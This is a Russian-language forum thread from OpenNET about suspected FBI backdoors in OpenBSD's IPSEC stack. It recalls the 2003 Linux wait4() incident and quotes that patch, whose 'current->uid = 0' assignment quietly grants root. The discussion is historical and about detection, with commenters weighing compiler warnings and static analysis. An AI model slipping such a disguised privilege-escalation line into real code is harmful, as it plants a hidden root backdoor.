The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Режим отображения отдельной подветви беседы [ Отслеживать ]

Оглавление

ФБР заподозрили в помещении бэкдора в IPSEC-стек OpenBSD, opennews (ok), 15-Дек-10, (0) [смотреть все]

Сообщения [Сортировка по времени | RSS]


31. "ФБР заподозрили в помещении бэкдора в IPSEC-стек OpenBSD"  +2 +/
Сообщение от shpsn (?), 15-Дек-10, 12:27 
В районе 2003-2005 года, если мне не изменяет память, проскакивала инфа о внедренной уязвимости в код ядра линукс, причем злоумышленнику потребовалось подменить один (!) символ. А ведь исходников -- миллионы строк и надо еще понимать как оно все работает, и если ФБР или еще кто подкупает разработчиков, то становится как-то грустно...
Ответить | Правка | К родителю #11 | Наверх | Cообщить модератору

47. "ФБР заподозрили в помещении бэкдора в IPSEC-стек OpenBSD"  +/
Сообщение от Котяра (??), 15-Дек-10, 12:59 
Где именно нужно было "подменить один (!) символ"?
Ответить | Правка | Наверх | Cообщить модератору

64. "ФБР заподозрили в помещении бэкдора в IPSEC-стек OpenBSD"  +/
Сообщение от Аноним (-), 15-Дек-10, 13:26 
> Где именно нужно было "подменить один (!) символ"?

хе... в исходниках ядра

Ответить | Правка | Наверх | Cообщить модератору

75. "ФБР заподозрили в помещении бэкдора в IPSEC-стек OpenBSD"  –2 +/
Сообщение от Котяра (??), 15-Дек-10, 13:59 
Тоесть для того, чтобы сделать чужую машину уязвимой, нужно сначала залогиницца на нее рутом, подправить сорсы ядра, скомпилить ново ядро, прописать его в граб и бутнуть машину. Линукс сакс.
Ответить | Правка | Наверх | Cообщить модератору

108. "ФБР заподозрили в помещении бэкдора в IPSEC-стек OpenBSD"  +6 +/
Сообщение от Аноним (-), 15-Дек-10, 15:33 
Ты дурной?
Вот этот код:

+       if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+                       retval = -EINVAL;

в выражении current->uid = 0 стоит = вместо ==, т.е. происходит не сравнение, а присваивание. Очень похоже на опечатку, но дает root доступ.

Ответить | Правка | Наверх | Cообщить модератору

111. "ФБР заподозрили в помещении бэкдора в IPSEC-стек OpenBSD"  +/
Сообщение от non anon (?), 15-Дек-10, 15:56 
Все правильно сказал товарищ выше. Этот патч надо накладывать вручную, потому что ни в один релиз он так и не попал, а из cvs его вычистили на следующий день.
Ответить | Правка | Наверх | Cообщить модератору

120. "ФБР заподозрили в помещении бэкдора в IPSEC-стек OpenBSD"  +2 +/
Сообщение от ФБР (?), 15-Дек-10, 16:51 
А ты знаешь сколько подобных "патчей" попало в релизы???
Ответить | Правка | Наверх | Cообщить модератору

145. "ФБР заподозрили в помещении бэкдора в IPSEC-стек OpenBSD"  +/
Сообщение от Areldar (?), 15-Дек-10, 17:59 
Такие патчи дают варнинги при компиляции так, что думаю нисколько
Ответить | Правка | Наверх | Cообщить модератору

161. "ФБР заподозрили в помещении бэкдора в IPSEC-стек OpenBSD"  +/
Сообщение от QuAzI (ok), 15-Дек-10, 18:50 
Надо же. Я почти не вижу софта без варнингов, хотя собираю очень даже много. И софт то небольшой по сравнению с ядром линуха обычно. Работает и все забивают на разборки в духе "возможно где-то когда-то проявится"
Ответить | Правка | Наверх | Cообщить модератору

167. "ФБР заподозрили в помещении бэкдора в IPSEC-стек OpenBSD"  +/
Сообщение от Аноним (-), 15-Дек-10, 19:07 
> Такие патчи дают варнинги при компиляции так, что думаю нисколько

Выражение "if ((options == (__WCLONE|__WALL)) && (current->uid = 0))" с точки зрения компилятора корректно и варнинга не даст (по крайней мере в 2003 году не давало).

Ответить | Правка | К родителю #145 | Наверх | Cообщить модератору

207. "ФБР заподозрили в помещении бэкдора в IPSEC-стек OpenBSD"  +/
Сообщение от злобный низкозадержечный анонимус (?), 15-Дек-10, 23:25 
Статический анализ кода такое найдет и сделает warning. Не думаю что его никто делать не пытался.
Ответить | Правка | Наверх | Cообщить модератору

239. "ФБР заподозрили в помещении бэкдора в IPSEC-стек OpenBSD"  +1 +/
Сообщение от kshetragia (ok), 16-Дек-10, 06:00 
> Такие патчи дают варнинги при компиляции так, что думаю нисколько

Не знаю насчет ядра Линукса, но обычный GNU софт как правило отличается обилием игнорируемых варнингов..

Ответить | Правка | К родителю #145 | Наверх | Cообщить модератору

128. "ФБР заподозрили в помещении бэкдора в IPSEC-стек OpenBSD"  +/
Сообщение от Michael Shigorinemail (ok), 15-Дек-10, 17:30 
Тогда некоторые пользовались этим CVS (из тех, кто не признавал и не применял BitKeeper), и Larry McVoy молодец, что не стал списывать на что-нить замеченное, а сразу поднял алярм.

Потому как могло попасть через третьи руки.

PS: в тот CVS оно попало через взломанный хост, где он жил.  До BK не добрались.

Ответить | Правка | К родителю #111 | Наверх | Cообщить модератору

56. "ФБР заподозрили в помещении бэкдора в IPSEC-стек OpenBSD"  +7 +/
Сообщение от Neandertaletsemail (ok), 15-Дек-10, 13:20 
http://anticopyright.ru/wiki/Wait4%28%29
Ответить | Правка | К родителю #31 | Наверх | Cообщить модератору

129. "ФБР заподозрили в помещении бэкдора в IPSEC-стек OpenBSD"  +/
Сообщение от Michael Shigorinemail (ok), 15-Дек-10, 17:32 
> http://anticopyright.ru/wiki/Wait4%28%29

Ага, спасибо, оно.

Ответить | Правка | Наверх | Cообщить модератору

135. "ФБР заподозрили в помещении бэкдора в IPSEC-стек OpenBSD"  +/
Сообщение от zazik (ok), 15-Дек-10, 17:39 
> http://anticopyright.ru/wiki/Wait4%28%29

Неплохо. Мне понравилось.

Ответить | Правка | К родителю #56 | Наверх | Cообщить модератору

185. "ФБР заподозрили в помещении бэкдора в IPSEC-стек OpenBSD"  +/
Сообщение от filosofem (ok), 15-Дек-10, 20:07 
Блин надеялся увидеть что-то в стиле JAPH.
Вообще странно как глядя на эти две строчки можно "ничего не заподозрить".
Да и несложным скриптом можно найти такие подозрительные вещи как присвоение внутри условия. Странно, что современные навороченные IDE с проверкой синтаксиса не умеют на это ворнингами ругаться.
Ответить | Правка | К родителю #56 | Наверх | Cообщить модератору

208. "ФБР заподозрили в помещении бэкдора в IPSEC-стек OpenBSD"  +/
Сообщение от злобный низкозадержечный анонимус (?), 15-Дек-10, 23:27 
> Блин надеялся увидеть что-то в стиле JAPH.
> Вообще странно как глядя на эти две строчки можно "ничего не заподозрить".
> Да и несложным скриптом можно найти такие подозрительные вещи как присвоение внутри
> условия. Странно, что современные навороченные IDE с проверкой синтаксиса не умеют
> на это ворнингами ругаться.

Ты про vim? :)

Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру